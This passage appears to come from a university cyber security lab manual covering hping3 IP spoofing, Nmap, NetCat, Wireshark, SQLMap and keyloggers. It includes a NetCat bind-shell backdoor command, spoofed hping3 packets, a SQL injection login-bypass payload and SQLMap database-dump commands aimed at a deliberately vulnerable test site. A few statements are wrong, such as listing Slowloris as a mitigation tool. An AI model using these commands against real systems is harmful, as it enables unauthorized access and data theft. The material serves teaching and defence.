by phishing and malware attacks to do the same type of attack, which requires thousands of devices to
coordinate a simultaneous attack on the same target resulting in a large DDOS attack.

How to prevent DoS Attack?

There are several measures that organizations can take to prevent or mitigate the impact of a DoS attack.
Here are some of the commonly used methods Increasing Network Bandwidth, Use of Firewall, Intrusion
Prevention Systems (IPS), Load Balancing, Use of Content Delivery Networks (CDN). Here are some
commonly used tools to mitigate DoS attacks: Fail2ban, Snort, ModeSecurity, Slowloris and Hping3.

By implementing these measures, organizations can help to prevent or reduce the impact of DoS attacks
on their systems and networks. Additionally, regular training and awareness programs can help employees
to identify and report suspicious activity, minimizing the risk of an attack.
Cyber Security (3150714)

Quiz:

What does the output of the following command explain in few lines and Attach Screen Shot of output.
Take the appropriate IP Address where necessary.

1. hping3 --udp <IP ADDRESS> -c 8

2. hping3 -2 -s 53 -a <spoofed IP> -c 1 <target IP> --udp -p 53

Cyber Security (3150714)

3. hping3 –h
Cyber Security (3150714)

4. What is IP Spoofing? What are the tools available to perform IP Spoofing?

IP Spoofing is a technique used to impersonate another device by falsifying the source

IP address in network packets. Attackers use this method to hide their identity, bypass access
controls, or launch attacks like denial-of-service (DoS) or man-in-the-middle (MITM).

Tools for IP Spoofing

hping: Packet crafting and analysis tool for TCP/IP spoofing.

Scapy: Python-based tool for creating custom spoofed packets.
Nemesis: Utility for injecting custom spoofed packets.
Cain & Abel: Windows-based tool for network sniffing and spoofing.
Ettercap: Tool for intercepting and altering communications.
Dsniff: Set of tools for network auditing, including spoofing.
SMAP: Tool for spoofing ICMP/TCP packets.

5. What are the ways to prevent IP Spoofing?

Packet Filtering: Use ingress/egress filtering to block spoofed packets.

Encryption: Encrypt communication with IPSec or SSL/TLS.
Network Monitoring: Use IDS/IPS to detect unusual traffic patterns.
Spoofing Detection Tools: Implement uRPF to validate source IPs.
Strong Authentication: Use MFA or certificates for user verification.
Network Segmentation: Separate critical systems into secure zones.
Firewalls: Block external packets claiming to be from internal IPs.
Rate Limiting: Limit traffic to reduce the impact of DoS attacks
Cyber Security (3150714)

6. How DoS/DDoS attack is harmful to any organization? What steps organizations should take to
prevent/mitigate such attack?

Impact of DoS/DDoS Attacks

Disrupts Services: Overwhelms servers, causing downtime and service unavailability.

Financial Loss: Downtime leads to lost revenue and potential customer loss.
Reputation Damage: Extended outages can harm the organization’s public image.
Security Risks: May be used to distract from other malicious activities like data breaches.
Prevention/Mitigation Steps
Firewalls & Load Balancers: Use to filter malicious traffic and distribute loads.
DDoS Protection Services: Employ services like Cloudflare or Akamai to absorb attack traffic.
Rate Limiting: Limit requests from specific IPs to prevent overloading.
Redundant Infrastructure: Use multiple servers and locations to balance the load.
Traffic Monitoring: Use IDS/IPS to detect abnormal traffic patterns early.
Anycast Routing: Distribute traffic across multiple servers to reduce the attack's impact.
Cyber Security (3150714)

Conclusion:
In conclusion, this experiment provided an understanding of IP spoofing and DoS attacks, demonstrating
how attackers use these techniques to compromise networks. By evaluating different network defense
tools, students learned how to detect and prevent these attacks using mechanisms like packet filtering,
ACLs, and encryption. The experiment also emphasized testing these defense tools in a simulated
environment to assess their strengths and weaknesses, enhancing the students' ability to defend
against real-world network attacks.
Cyber Security (3150714)

Rubric:

Criteria 1 2 3 4 Total
Marks

Faculty Signature
Cyber Security (3150714)

Experiment No: 03
Explore the Nmap tool and list how it can be used for network defense.
Date:

Competency and Practical Skills:

Relevant CO: Evaluate network defense tools.

Objectives:
• To understand what IP spoofing and DoS attack are and how they are used to launch attacks on a
network.
• To learn about the different types of IP spoofing attacks and how they can be detected and
prevented using network defense tools.
• To compare the effectiveness of various network defense tools against IP spoofing and DoS
attacks, such as packet filtering, ingress filtering, egress filtering, encryption, authentication, and
anomaly detection.
• To apply the network defense tools to a simulated network environment and test their performance
against IP spoofing and DoS attacks using different attack scenarios and
parameters.
• To evaluate the results of the network defense tools and analyze their strengths and weaknesses
against IP spoofing and DoS attacks.

Equipment/Instruments: Computer with Internet

Introduction to Nmap
Nmap, short for "Network Mapper," is a popular open-source tool used for network exploration,
management, and security auditing. It was initially developed in the late 1990s by Gordon Lyon (also
known by his pseudonym "Fyodor") and has since become one of the most widely used network scanning
tools.

Nmap is designed to scan and map networks, identify hosts, and discover available services, operating
systems, and vulnerabilities. It can also be used to audit the security of networked systems by performing
various types of scans, such as port scanning, OS detection, version detection, and vulnerability scanning.

Nmap is highly customizable and flexible, with many options and settings available to users. It is also
cross-platform and can run on various operating systems, including Windows, macOS, and Linux.

Overall, Nmap is a powerful tool for network exploration and security auditing that has become an
essential part of many network administrators' and security professionals' toolkits.

Here are some of the most common uses of Nmap:

1. Network mapping: Nmap can be used to map out networks and identify hosts, devices, and
services running on them. This is useful for network administrators to get a clear understanding
Cyber Security (3150714)

of their network topology and for security professionals to identify potential attack surfaces.

2. Port scanning: Nmap can be used to scan for open ports on hosts and identify the services running
on them. This is useful for network administrators to ensure that all required services are up and
running and for security professionals to identify potential vulnerabilities.

3. OS detection: Nmap can be used to detect the operating system running on a host based on its
responses to various probes. This is useful for network administrators to ensure that all systems
are running the required operating system and for security professionals to identify potential
vulnerabilities.

4. Version detection: Nmap can be used to identify the version of the software running on a host
based on its responses to various probes. This is useful for network administrators to ensure that
all systems are running the required software version and for security professionals to identify
potential vulnerabilities.

5. Vulnerability scanning: Nmap can be used to scan for known vulnerabilities on hosts and identify
potential security issues. This is useful for security professionals to identify and address potential
vulnerabilities before they can be exploited.

Nmap features include:

1. Host discovery – Identifying hosts on a network. For example, listing the hosts that respond to
TCP and/or ICMP requests or have a particular port open. Nmap offers several methods for host
discovery, including:
a. Ping sweep: Nmap sends ICMP echo requests (pings) to a range of IP addresses and checks
for responses. This is the simplest and most common method of host discovery, but it may
not work in all cases as some hosts may block ICMP traffic.
b. ARP scanning: Nmap sends ARP requests to a range of IP addresses and checks for
responses. This method is more reliable than ping sweep, as it works at the data-link layer
and can discover hosts that are configured not to respond to ICMP traffic.
c. TCP SYN scanning: Nmap sends TCP SYN packets to a range of IP addresses and checks
for responses. This method is stealthier than ping sweep and ARP scanning, as it doesn't
complete the TCP handshake and leaves no trace in the target's logs.
d. UDP scanning: Nmap sends UDP packets to a range of IP addresses and checks for
responses. This method is useful for discovering hosts that are running services that don't
respond to TCP traffic.
2. Port scanning – Enumerating the open ports on target hosts.
a. TCP SYN scan: This is the most common type of port scan and involves sending a SYN
packet to each port and analyzing the response. If the port is open, the target will respond
with a SYN-ACK packet, and if it's closed, the target will respond with a RST packet.
b. TCP connect scan: This method involves initiating a full TCP connection to each port and
analyzing the response. This method is slower than SYN scanning but may be more reliable
in certain cases.
c. UDP scan: This method involves sending a UDP packet to each port and analyzing the
response. UDP scanning can be slower than TCP scanning, as UDP is a connectionless
protocol, and there may not be a response from closed ports.
d. Stealth scan: This method is designed to avoid detection by sending packets that are less
likely to be logged by intrusion detection systems (IDS) and firewalls. This method can be
slower and less reliable than other scanning methods.
e. Fragmentation scan: This method involves fragmenting packets to evade firewall rules and
IDS. This method can be slower and less reliable than other scanning methods.
Cyber Security (3150714)

3. Version detection – Interrogating network services on remote devices to determine application

name and version number.
4. TCP/IP stack fingerprinting – Determining the operating system and hardware characteristics
of network device.

Different Command and their example of Nmap:

• nmap [target]:
a. This Command target single IP(Host).
b. For Example, nmap 192.168.1.33
c. In this example nmap target this IP and trace it and fetch the MAC address and open
PORT

(Fig: Targeting Single IP Address)

Cyber Security (3150714)

• nmap [target1, target2, etc:

a. This Command Target Multiple IP Address (Host).
b. For example, nmap 192.168.1.33 192.168.1.42
c. In this example nmap target multiple IP and Fetch All the details Like MAC Address and
Port (Open/Close).

(Fig: Scanning Multiple IP)

Cyber Security (3150714)

• Scan a Range of Hosts:

a. Syntax: nmap [range of IP addresses]
b. This Command is used to scan a specific rang of IP addresses (Host)
c. For Example, here nmap 192.168.1.1-100.
d. So, here We get different Host information which is Available in rang of 1-100.
Cyber Security (3150714)

• Operating System Detection:

a. Syntax: nmap -O [target]
b. This Command is used to Detect Operating System of That Targeted IP Address.
c. Here For example, We have one IP Address Which is 192.168.1.42 so we target that IP
and We get the OS in which That Particular System is running Currently. And also get
Some Port Information.
Cyber Security (3150714)

• Scan an Entire Subnet:

a. Syntax: nmap [ip address/cdir].
b. This Command is used to scan entire Subnet.
c. For example, here nmap 192.168.1.1/24.
d. In this example We get All the Host in the Subnet of 192.168.1.1/24.
e. In this subnet we can make maximum 255 Host. But in this subnet, there is only 3 Host is
up. Which is 192.168.1.1,192.168.1.13, 192.168.1.42.
Cyber Security (3150714)

• Perform a Sequential Port Scan:

a. Syntax: nmap -r [target].
b. Nmap -r 192.168.1.1
c. This Command Scan All the Port in sequential Form For Particular IP Address Or Host.
Cyber Security (3150714)

• Perform an Aggressive Scan:

a. Syntax: nmap -A [target].
b. nmap -A 192.168.1.33
c. Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (- sC),
and traceroute (--traceroute). This mode sends a lot more probes, and it is more likely to
be detected, but provides a lot of valuable host information.
Cyber Security (3150714)

• Only Display Open Ports:

a. Syntax: nmap –open [target].
b. nmap -open 192.168.1.1
c. Nmap has the option --open, which will filter out all the other potential states. If you are
scanning under Linux, you could also use grep to achieve a very similar result.
d. This Command Shows Only Open or Possibly Open Port
Cyber Security (3150714)

• Scanning a website public IP:

a. In this command we are scanning and getting the information of website public IP.
b. nmap -v -A scanme.nmap.org
Cyber Security (3150714)

• Scan Ports by Name

a. Syntax: nmap -p [port number(s)] [target]
b. nmap -p 80 192.168.1.1 (Only 1 port 80 Scan)
c. nmap -p 1-999 192.168.1.1 (Range of 1-999 port scan
Cyber Security (3150714)

Conclusion

In conclusion, this experiment introduced Nmap as a versatile and powerful tool for network defense.
Students learned how Nmap can be used to scan networks, identify hosts and vulnerabilities, and
perform various types of security audits. By exploring its features and functions, the experiment
demonstrated Nmap's effectiveness in securing networks and defending against potential threats,
making it an essential tool for network administrators and cybersecurity professionals.

Rubrics:

Criteria 1 2 3 4 5 Total
Marks

Faculty Signature
Cyber Security (3150714)

Experiment No: 04
Explore the NetCat tool.
Date:

Competency and Practical Skills:

Relevant CO: Evaluate network defense tools

Objectives:
• Understanding the basics of network communication and the role of NetCat in facilitating it.
• Learning the syntax and basic usage of the NetCat command-line interface.
• Understanding how to use NetCat for port scanning and banner grabbing.
• Understanding how to use NetCat for file transfer and remote shell access.
• Understanding how to use NetCat for network debugging and troubleshooting.
• Understanding the security implications of using NetCat and how to use it responsibly.
• Exploring advanced NetCat usage, such as creating backdoors and establishing encrypted
connections.
• Learning how NetCat can be used in conjunction with other networking tools and protocols, such
as Nmap and SSH.
• Practicing using NetCat in a simulated network environment to gain hands-on experience and
proficiency.
• Developing critical thinking skills by analyzing and interpreting the results of NetCat commands
and applying them to real-world networking scenarios.

Introduction to NetCat

NetCat, also known as "nc," is a powerful and versatile command-line tool used for network
communication. It was first developed in the mid-1990s by Hobbit, a member of the hacker collective
known as L0pht Heavy Industries and has since become a popular utility in the field of computer
networking and security.

NetCat allows users to create, send, and receive network packets over various protocols, including TCP,
UDP, and ICMP. It can also be used for port scanning, banner grabbing, and network debugging. Its
simplicity and flexibility have made it a go-to tool for system administrators, network engineers, and
security professionals.

Some of the common use cases for NetCat include transferring files between systems, establishing a
remote shell access to a system, and testing network services for vulnerabilities. Additionally, NetCat can
be used in combination with other tools and protocols, such as Nmap and SSH, to further extend its
capabilities.

While NetCat is a powerful tool, its power can also be a double-edged sword, as it can be used for
malicious purposes. As such, it's important to use NetCat responsibly and with the appropriate permissions
and safeguards in place.

Some of the common functionalities of NetCat include:

Cyber Security (3150714)

• Port Scanning: NetCat can be used to scan for open ports on a target system. This can be useful
for identifying potential vulnerabilities or misconfigured services.

• Banner Grabbing: NetCat can be used to retrieve banner information from network services
running on a target system. This can provide valuable information about the software and version
numbers running on those services.

• File Transfer: NetCat can be used to transfer files between systems over a network. This can be
useful for transferring large files quickly and efficiently.

• Remote Shell Access: NetCat can be used to establish remote shell access to a target system. This
can provide a convenient way to access a remote system and perform tasks without physically
being at the machine.

• Chatting: NetCat can be used to chat with other users on a network. This can be useful for
communication in environments where other chat applications are unavailable.

• Port Forwarding: NetCat can be used to forward traffic from one port to another on a local or
remote system. This can be useful for accessing services on a remote system that are not directly
accessible from the local network.

• Network Debugging: NetCat can be used to troubleshoot network issues and test network
connectivity. This can help identify problems and determine if network services are functioning
correctly.

• Backdoor Creation: NetCat can be used to create backdoors on a target system. This can provide
unauthorized access to the target system, making it a potentially dangerous feature if used
maliciously.

In summary, NetCat is a powerful tool with a wide range of functionalities that make it a valuable asset
to network professionals.

In Linux, NetCat comes pre-installed. But if it is not installed then Using Following command you can
download it in Ubuntu.
sudo apt-get install netcat

For Windows, Download zip file from the URL - https://eternallybored.org/misc/netcat/

Once Downloaded, Unzip the file and through Command Prompt you can access NetCat.

How to use NetCat?

• Generalized Syntax is- nc [parameters] [Hostname] [Port Number]
• Example, nc -v google.com 80, then use GET method using GET / HTTP/1.0
• Host name can be IP Address, URL or Name.
Cyber Security (3150714)

Demo – 1: Chat Application using NetCat

Steps:
1. Open two terminals.

2. In Terminal 01, Type: nc -vlp 1200

a. v for verbose
b. l for Listening of specific port for incoming request
c. p for specifying port number, in our case it 1200. (Don’t use Well known Port - for this
application)

3. In Terminal 02, Type: nc YourIpAddress 1200

a. Enter your IP address at YourIpAddress followed by same port number.
b. Ex. nc 192.168.1.1 1200

4. Now you can chat through NetCat.

a. This type of chat is not secure.
b. Any network sniffing tool can be used to read the messages.

5. Press ctrl+c in both terminals to exit.

Cyber Security (3150714)

Demo-02 - File Transfer

1. Open Two Terminals

2. In Terminal 01, Type: nc -vlp 1200 < file.txt
a. Create file.txt in the root directory.
3. In Terminal 02, Type: nc IpAddress 1200 > receive.txt
a. Ex. nc 192.168.1.1 1200 > receive.txt
b. After execution receive.txt will be created with content of file.txt

This command will transfer the data of file.txt to receive.txt.

Cyber Security (3150714)

Demo-03 - HTTP Request

1. Open One Terminal.

2. Type: nc url 80
a. In this, you will specify Url of any website or IP Address
b. Ex. nc www.gtu.ac.in 80
c. It will connect on port 80. You can use other port also like 22 for SSH
d. Since we are connected on 80 port no., we can request webpage using GET command.
3. Type: GET / HTTP/1.0
4. Type: Host:url
Cyber Security (3150714)
Cyber Security (3150714)

Demo-04 - Port Scanning

1. In Terminal, Type: nc -v -n IpAddress PortRangeLow-PortRangeHigh

a. Ex. nc -v -n 192.168.1.1 1-1000
2. This command will scan for open port. If any, Port are open it will automatically connect to it.
Cyber Security (3150714)

Demo-05 - Reverse Shell (Backdoor)

• In this demo, Security Expert/Attacker can execute programs on remote pc/server.

• You can try this on your pc using two terminals.

1. Open Two Terminals

2. In Terminal 01, Type: ncat -vlp PortNo -e executablefile
a. For Linux, ncat -vlp 1200 -e /bin/bash
b. For windows, ncat -vlp 1200 -e cmd.exe
3. In Terminal 02, Type: nc IpAddress PortNo
a.Nc 192.168.43.217 1200
4. Now you can execute Terminal Commands.
Type in linux commands like: ls
Type in windows commands like: dir, services.msc
Cyber Security (3150714)
Cyber Security (3150714)
Cyber Security (3150714)

References

Conclusion

Defense tools must be equipped to detect unauthorized use of NetCat, particularly in scenarios where
it is used to establish hidden channels or transfer data over non-standard ports.
File Transfer :- Security tools must ensure proper encryption, authentication, and monitoring of file transfers
to detect anomalies. Implementing strict file integrity checks and transfer logs can help detect unauthorized
actions.
HTTP request:- Web application firewalls (WAFs) and intrusion detection systems (IDS) must inspect
HTTP traffic for unusual patterns, such as large payloads, repeated requests, and malformed headers that may
indicate malicious intent.
Port Scanning:- A network defense strategy should include port monitoring, detection of repeated connection
attempts, and rate-limiting to respond to suspicious port-scanning activities.
Reverse Shell(Backdoor):- Defense tools need to monitor outbound traffic closely, flagging unusual reverse
connection attempts. Additionally, deploying endpoint detection and response (EDR) tools to prevent
unauthorized access is essential.
Cyber Security (3150714)

Rubrics:

Criteria 1 2 3 Total
Marks

Faculty Signature
Cyber Security (3150714)

Experiment No: 05
Use Wireshark tool and explore the packet format.

Date:

Relevant CO: Evaluate network defense tools.

Objectives:
1. Understanding of Wireshark tool
• Demonstrates knowledge of Wireshark functionalities and commands
• Describes the purpose of Wireshark in network traffic analysis.
2. Capturing and analyzing network traffic
• Successfully captures network traffic using Wireshark.
• Demonstrates proficiency in filtering and analyzing network traffic.
• Ability to identify common network protocols and their functions.
3. Exploring packet format
• Demonstrates knowledge of the packet format and its components
• Identifies and analyzes different types of packets.
• Ability to interpret packet data and understand its significance.
4. Troubleshooting and problem-solving
• Ability to troubleshoot common Wireshark-related issues.
• Demonstrates proficiency in problem-solving and identifying the root cause of issues.
• Ability to apply best practices in network traffic analysis and troubleshooting.

Introduction to Wireshark
Wireshark is a widely used network protocol analyzer tool that allows users to capture and analyze
network traffic in real-time. It is an open-source tool that provides users with a detailed view of the
network traffic, including the source and destination of packets, their content, and the protocols used.
Wireshark can be used to troubleshoot network issues, identify security threats, and monitor network
activity. It supports a wide range of network protocols, including Ethernet, TCP/IP, HTTP, DNS, and
many others. Wireshark is an essential tool for network administrators, security professionals, and anyone
who needs to monitor and analyze network traffic. With its powerful features and easy-to-use interface,
Wireshark is an excellent choice for anyone looking to gain insight into the inner workings of computer
networks.

To install Wireshark on Linux, you can follow the following steps:

1. Open the Terminal on your Linux system.

2. Update the package repository using the following command:
sudo apt-get update
3. Use following command to install wireshark: sudo apt-get install wireshark
4. Type wireshark in terminal to open it after installation.

To install in Windows Operating System, follow the following steps:

1. Download wireshark from https://www.wireshark.org/download.html

2. Once Downloaded open exe file.
Cyber Security (3150714)

Figure 1. Welcome screen

Figure 2. License agreement

Cyber Security (3150714)

Figure 3. select component to install.

Cyber Security (3150714)

Figure 4. configure additional task to be performed after installation ends

Figure 5. Select Installation location.

Cyber Security (3150714)

Figure 6. install latest version of Nmap if your Nmap version is Lower

Figure 7. Select if you want to capture USB traffic

Cyber Security (3150714)

Figure 8. Installation process starts.

Figure 9. Installation process finished.

3. Click on wireshark icon to start it after successful installation.

Fig: Wireshark Home Screen with various interface

Cyber Security (3150714)

Capturing data packets on Wireshark

When you open Wireshark, you see a screen showing you a list of all the network connections you can
monitor. You also have a capture filter field to only capture the network traffic you want to see.
You can select one or more of the network interfaces using shift+left-click. Once select the network
interface, you can start the capture, and there are several ways to do that.
Click the first button on the toolbar, titled “Start capturing packets.”

You can select the menu item Capture -> Start.

Cyber Security (3150714)

Or you could use the keystroke Control+E.

During the capture, Wireshark will show you the packets captured in real-time.

Once you have captured all the packets needed, use the same buttons or menu options to stop the capture
as you did to begin.
Best practice dictates stopping Wireshark’s packet capture before analysis.

Analyzing data packets on Wireshark

Wireshark shows you three different panes for inspecting packet data. The Packet List, the top pane, lists
all the packets in the capture. When you click on a packet, the other two panes change to show you the
details about the selected packet. You can also tell if the packet is part of a conversation. Here are details
about each column in the top pane:
• No.: This is the number order of the packet captured. The bracket indicates that this packet is
part of a conversation.
• Time: This column shows how long after you started the capture this packet was captured. You
can change this value in the Settings menu to display a different option.
• Source: This is the address of the system that sent the packet.
• Destination: This is the address of the packet destination.
• Protocol: This is the type of packet. For example: TCP, DNS, DHCPv6, or ARP.
• Length: This column shows you the packet’s length, measured in bytes.
• Info: This column shows you more information about the packet contents, which will vary
depending on the type of packet.
Packet Details, the middle pane, shows you as much readable information about the packet as possible,
depending on the packet type. You can right-click and create filters based on the highlighted text in this
field.
The bottom pane, Packet Bytes, displays the packet exactly as it was captured in hexadecimal.
When looking at a packet that is part of a conversation, you can right-click the packet and select Follow
to see only the packets that are part of that conversation.

Wireshark filters
Cyber Security (3150714)

Some of the best features of Wireshark are the capture filters and display filters. Filters allow you to view
the capture the way you need to see it to troubleshoot the issues at hand. Below are several filters to get
you started.

Examples of filters

1. Filter syntax: ip.addr == [IP ADDRESS] ex.

Ex. ip.addr == 192.168.1.1
This filter will display all network traffic that has the IP address "192.168.1.1" either as the
source or destination address.
Cyber Security (3150714)

2. Filter syntax: ip.src == [IP ADDRESS]

Ex. ip.src == 192.168.1.1
This filter will display all network traffic that has the IP address "192.168.1.1" as the source

address.
Cyber Security (3150714)

3. Filter syntax: ip.dst == [IP ADDRESS]

Ex., ip.dst == 192.168.1.1
This filter will display all network traffic that has the IP address "192.168.1.1" as
the destination address.
Cyber Security (3150714)

4. Filter syntax: tcp.port == [port] or udp.port == [port]

Ex. tcp.port == 443 or udp.port == 1455
This filter will display all network traffic that uses either TCP port 443 or UDP port 1455.
Cyber Security (3150714)

5. Filter syntax: eth.addr == [Ethernet address]

Ex. eth.addr == 00:11:22:33:44:55
This filter command will display network traffic that has a source or destination
MAC address of "00:11:22:33:44:55".
Cyber Security (3150714)

Using wire shark tool capture data passed into vulnerable website Here we are
capturing data of http://testphp.vulnweb.com/login.php
First we are entering User name and password then clicking login button

Now in wireshark tool find GET /login.php HTTP/1.1

//ADD SCRENSHOT OF WIRESHARK FOR LOGIN SCREEN

Then right click on Hypertext transfer protocol and from dropdown go to follow and then HTTP stream.
Cyber Security (3150714)

Here we can see what we have passed into the login form.

Capture Images using Wireshark.

We can also capture images.

Start wire shark capturing and then Open Image in same website that is used above or click link below.
http://testphp.vulnweb.com/listproducts.php?cat=1
Cyber Security (3150714)

then click on any image from number of the images. now stop capturing and click on File-> Export

objects -> HTTP objects then you will see number of objects as below.
Cyber Security (3150714)
 Cyber Security (3150714)
Click on the preview button to see captured Image here is the output image.

References:

Conclusion:

This experiment successfully explored the Wireshark tool for network traffic analysis. We
learned how to capture and analyze network packets, identify common protocols and their functions,
and understand the packet format. By troubleshooting Wireshark-related issues and applying best practices,
we gained valuable skills in network traffic analysis and problem-solving.
Cyber Security (3150714)
Rubrics:

Criteria 1 2 3 Total
Marks

Faculty Signature
Cyber Security (3150714)
Experiment No: 06
Examine SQL injection attack. Perform SQL injection with SQLMap on
vulnerable websites.

Date:

Competency and Practical Skills:

Relevant CO:

Objectives:
• To understand the concept and mechanism of SQL injection attack and its impact on web
security.
• To learn how to use SQLMap, a popular tool for automating SQL injection detection and
exploitation.
• To practice SQL injection techniques on vulnerable websites and analyze the results.
• To develop skills and awareness for preventing and mitigating SQL injection attacks in
web development.

What is SQL Injection

SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of
the statement or appending a condition that will always be true. It takes advantage of the design
flaws in poorly designed web applications to exploit SQL statements to execute malicious SQL
code.
Let’s consider a simple web application with a login form. The code for the HTML form is shown
below.
Suppose user supplies admin@admin.sys and 1234 as the password. The statement to be
executed against the database would be
SELECT * FROM users WHERE email = ‘admin@admin.sys’ AND password = md5(‘1234’);
The above code can be exploited by commenting out the password part and appending a condition
that will always be true. Let’s suppose an attacker provides the following input in the email address
field.
xxx@xxx.xxx’ OR 1 = 1 LIMIT 1 -- ‘]
xxx for the password.
The generated dynamic statement will be as follows.
SELECT * FROM users WHERE email = ‘xxx@xxx.xxx’ OR 1 = 1 LIMIT 1 -- ‘ ] AND
password = md5(‘1234’);
HERE,
• xxx@xxx.xxx ends with a single quote which completes the string quote.
• OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to
only one record.
• -- ‘AND … is a SQL comment that eliminates the password part.

Other SQL Injection attack types:

SQL Injections can do more harm than just passing the login algorithms. Some of the attacks
include.

• Deleting data
Cyber Security (3150714)
• Updating data
• Inserting data
• Executing commands on the server that can download and install malicious programs such
as Trojans.
• Exporting valuable data such as credit card details, email, and passwords to the attacker’s
remote server
• Getting user login details etc
The above list is not exhaustive; it just gives you an idea of what SQL Injection
How to Prevent against SQL Injection Attacks
An organization can adopt the following policy to protect itself against SQL Injection attacks.
• User input should never be trusted – It must always be sanitized before it is used in
dynamic SQL statements.
• Stored procedures – these can encapsulate the SQL statements and treat all input as
parameters.
• Prepared statements –prepared statements to work by creating the SQL statement first then
treating all submitted user data as parameters. This has no effect on the syntax of the SQL
statement.
• Regular expressions –these can be used to detect potential harmful code and remove it
before executing the SQL statements.
• Database connection user access rights –only necessary access rights should be given to
accounts used to connect to the database. This can help reduce what the SQL statements can
perform on the server.
• Error messages –these should not reveal sensitive information and where exactly an error
occurred. Simple custom error messages such as “Sorry, we are experiencing technical
errors. The technical team has been contacted. Please try again later” can be used instead of
displaying the SQL statements that caused the error.

Evaluate SQL Injection

1) SQL Injection on Codingame Website: https://www.codingame.com/playgrounds/154/sql-
injection-demo/sql-injection
2) SQL Injection on HackSplaining Website: https://www.hacksplaining.com/exercises/sql-
injection
Cyber Security (3150714)

How to Install SQLmap?

SQLMAP comes pre-installed with kali Linux, which is the preferred choice of most penetration
testers. However, you can install sqlmap on other debian based linux systems using the command.

sudo apt-get install sqlmap

How to use SQLmap?

Use following URL to test SQLMap using following link:

http://testphp.vulnweb.com/listproducts.php?cat=1

Do not use this tool on any other website.

Run following Commands:

Command-1: sqlmap -h
Cyber Security (3150714)
Command 2: List information about the existing databases
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
We would want to test whether it is possible to gain access to a database. So we use the –dbs
option to do so. –dbs lists all the available databases.
Cyber Security (3150714)
Cyber Security (3150714)
Command 3: List information about Tables present in a particular Database
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables
Cyber Security (3150714)
Command 4: List information about the columns of a particular table
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart
-T artists --columns
Cyber Security (3150714)
Command 5: Dump the data from the columns.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart -T artists -C aname --dump

References:

https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/

Conclusion:

This experiment successfully examined SQL injection attacks and their impact on web security. We
learned how to use SQLMap to automate SQL injection detection and exploitation, and practiced these
techniques on vulnerable websites. By understanding the mechanisms of SQL injection and developing
prevention strategies, we gained valuable skills for securing web applications against this common vulnerability
Cyber Security (3150714)
Rubrics:

Criteria 1 2 3 4 5 Total
Marks

Faculty Signature
Cyber Security (3150714)
Experiment No: 07
Examine software keyloggers and hardware keyloggers.
Date:

Relevant CO:

Objectives:
• To understand the concept and types of keyloggers and how they can be used to capture
keystrokes and other sensitive information.
• To learn how to identify and analyze software keyloggers and hardware keyloggers on a
system.
• To practice using various tools and techniques to detect and remove keyloggers from a
system.
• To develop skills and awareness for preventing and mitigating keylogger attacks in
computer security.

KeyLogger:
o Keystroke logging, often referred to as keylogging or keyboard capturing, is the
action of recording (logging) the keys struck on a keyboard, typically covertly, so
that a person using the keyboard is unaware that their actions are being monitored.
Data can then be retrieved by the person operating the logging program. A keystroke
recorder or keylogger can be either software or hardware.
o While the programs themselves are legal, with many designed to allow employers to
oversee the use of their computers.
o keyloggers are most often used for stealing passwords and other confidential
information.
o Keylogging can also be used to study keystroke dynamics or human-computer
interaction. Numerous keylogging methods exist, ranging from hardware and
software-based approaches to acoustic cryptanalysis.

• Types Of KeyLogger:
There are two types of KeyLogger:
1. Software Based KeyLogger: Software keyloggers are applications that must be installed
on the computer to work. This is the most common type of keyloggers that hackers
spread on the Internet. Software keyloggers install on the computer when the user
downloads an infected application. Once installed, it monitors the paths of the operating
system that the keys you press on the keyboard must go through. That’s how software
keyloggers track and record keystrokes. Then it transmits the information to the hacker
via a remote server.
2. Hardware Based KeyLogger: Hardware keyloggers work the same way as software
keyloggers. Their only difference is hardware keyloggers must be attached to victim
computer physically to record keystrokes. To retrieve the information, the hacker needs
to download it from the storage device. Retrieving data while the hardware keylogger is
at work is not possible. The workaround is to make the device accessible via WIFI to
obtain data. Some examples of hardware keyloggers are acoustic keylogger and
keyboard keylogger.
Cyber Security (3150714)
Install and Use one of the following Keyloggers:
1. Kidlogger - https://kidlogger.net/
2. Refog Personal Monitor - https://refog.com/pc-monitoring-software.html
3. All In One Keylogger - https://www.relytec.com/
4. You can use any other Key loggers. Above one are few of the examples.
Cyber Security (3150714)
Cyber Security (3150714)
Cyber Security (3150714)
Cyber Security (3150714)
Cyber Security (3150714)
Cyber Security (3150714)
Cyber Security (3150714)

How to Detect, Prevent and Mitigate Keyloggers?

To detect, prevent, and mitigate keyloggers using the Refog Personal

Monitor tool, follow these steps:

1. Detecting Keyloggers

• Install Refog Personal Monitor: Download and install the Refog Personal Monitor tool on your
system.

• Run a system scan: Once installed, use the tool to scan your computer. Refog monitors
all activities, including keystrokes, making it easier to detect any keyloggers installed on
the system.

• Review keystroke logs: The tool logs keystrokes from all running applications. Analyze
these logs to detect any suspicious or unknown programs capturing keystrokes.
 Cyber Security (3150714)
• Check suspicious activity: Refog also captures information like screenshots and visited websites,
helping you identify if any suspicious programs or actions are related to a keylogger.

2.Preventing Keyloggers

• Monitor running applications: Refog monitors all active applications and can alert you of any
unfamiliar or suspicious processes running on the system, allowing you to terminate them before
they cause harm.
• Update software regularly: Keep Refog and your operating system updated to prevent new
keylogger variants from bypassing security measures.

• Use alerts and notifications: Set up alerts in Refog for unusual activity, such as new software
installations or suspicious keystroke logs.

3. Mitigating Keylogger Threats

• Terminate malicious processes: If Refog detects a keylogger, you can use task manager or
security tools to immediately terminate the malicious process.

• Uninstall suspicious programs: Identify any software associated with the keylogger and
uninstall it. Refog’s monitoring helps you detect which applications are logging keystrokes or
performing unauthorized actions.

• Use anti-malware tools: While Refog Personal Monitor helps in detection, complement it
with a strong anti-malware tool for complete protection against keyloggers.

• Regularly review logs: Continuously monitor keystroke logs and screenshots to catch any future
keylogging attempts early on.

By combining Refog’s monitoring capabilities with a vigilant approach, you can

Effectively detect, prevent, and mitigate keylogger threats.
 Cyber Security (3150714)
References:

• https://www.refog.com/
• https://www.keylogger.org/monitoring-software-review/refog-personal-monitor.html
• https://impulsec.com/parental-control-software/refog-keylogger-review/
• https://www.youtube.com/watch?v=4sxzuqisVSg

Conclusion:

This experiment successfully explored the concept of keyloggers and their use in capturing keystrokes
and sensitive information. We learned about the different types of keyloggers (software and hardware)
